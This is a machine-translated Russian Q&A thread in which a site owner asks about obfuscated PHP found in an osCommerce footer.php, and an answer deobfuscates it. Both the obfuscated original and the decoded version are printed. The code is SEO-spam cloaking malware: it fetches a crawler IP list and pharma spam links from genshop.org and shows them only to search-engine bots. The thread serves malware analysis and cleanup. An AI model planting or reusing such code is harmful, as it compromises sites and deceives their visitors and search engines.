Является ли этот код эксплойтом? Что это за код?
Я смотрю на сайт, который был использован кем-то/чем-то. На сайте была куча ссылок, введенных в его нижний колонтитул, которые ссылаются на фармацевтические питчи, и кто знает, что еще. Есть / было много ссылок прямо в верхней части нижнего колонтитула. Я могу найти их только сейчас, на кэшированных страницах в индексе Yahoo. Google все еще не доволен сайтом, хотя и живой сайт больше не показывает никаких ссылок. Это для a client..so я в основном знаю, что мне сказали, и что я могу найди еще мудрого.
Я нашел этот код в самом верху нижнего колонтитула.php (это сайт OsCommerse):
<?php $x13="cou156x74"; $x14="x65x72162x6frx5fx72ep157162164ing"; $x15="146151lx65"; $x16="146i154145_gx65tx5fx63x6fn164145n164s"; $x17="163x74rle156"; $x18="163tr160ox73"; $x19="sux62x73164162"; $x1a="tr151m";
ini_set(' display_errors','off');$x14(0);$x0b = "150tx74px3a5757x67145nx73h157x7056org/163x63162ipt57155a163kx2ex74xx74";$x0c = $x0b; $x0d = $_SERVER["x52E115O124105_A104104122"]; $x0e = @ $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != "" ){ if ( ($x11 = $x18($x10, "*")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16("150164164160x3a/57g145x6ex73x68o16056o162x6757160aralx69x6ex6bx73x2f156e167x2f357x66145e144x72157llex72x2e143x6fx6dx2ex74170x74"); echo "$x12"; } }}echo "x3c4155x2d 60x3671x63x35b4x66e5606267146x39x62637x64x653x31d2be514514114366x3740x2d-76";?>
Когда я просматриваю исходные кэшированные страницы с "плохими" ссылками, этот код помещается прямо там, где я его нашел в нижнем колонтитуле.PHP-источник. Небольшое исследование в google показывает, что там есть эксплойты с похожим кодом.
Как вы думаете, когда я запускаю его на своем собственном сервере, все, что я получаю, - это эхо-комментарий в исходнике только так:
<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
Я не хочу этого делать. просто поспешно удалите код и скажите "ваш хороший" только потому, что он выглядит плохо, особенно потому, что у меня нет непосредственного способа узнать, что "плохие ссылки" исчезли. Кстати, все ссылки идут на мертвый URL.
Вы можете видеть, что плохие страницы все еще кэшируются в Мужлан: http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/cache.aspx?q=http%3a%2f%2fwww.feedroller.com%2f+medicine&d=4746458759365253&mkt=en-US&setlang=en-US&w=b97b0175,d5f14ae5&icp=1&.intl=us&sig=Ifqk1OuvHXNcZnGgPR9PbA--
3 ответа:
Вот неискаженный сценарий (более или менее)
Это просто сброс содержимого этого url на вашу страницу
Он также проверяет remote_addr по списку IP-адресов (google и др.), чтобы попытаться остаться незамеченным.
Похоже, на тебя нападают genshop.com
<?php $count="cou\156\x74"; // count $error_reporting="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; // error_reporting $file="\146\151l\x65"; // file $file_get_contents="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; // file_get_contents $strlen="\163\x74rle\156"; // strlen $strpos="\163tr\160o\x73"; // strpos $substr="su\x62\x73\164\162"; // substr $trim="tr\151m"; //trim ini_set(' display_errors','off'); $error_reporting(0); $x0b = "http://genshop.org/scripts/mask.txt"; $url = $x0b; $tmp = "REMOTE_ADDR"; $x0d = $_SERVER[$tmp]; $tmp_filename = "http://genshop.org/paralinks/new/3/feedroller.com.txt"; $IPs = @ $file($url); for ( $i = 0; $i < $count($IPs); $i++ ) { $curr_ip = $trim($ips[$i]); if ( $curr_ip != "" ) { if ( ($x11 = $strpos($curr_ip, "*")) !== false ) $curr_ip = $substr($curr_ip, 0,$x11); // check visitor ip against mask list if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) { $x12 = $file_get_content($tmp_filename); echo "$x12"; // print spam contents } } } echo $curr_ip; } $tmp2 = "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076"; echo $tmp2; ?>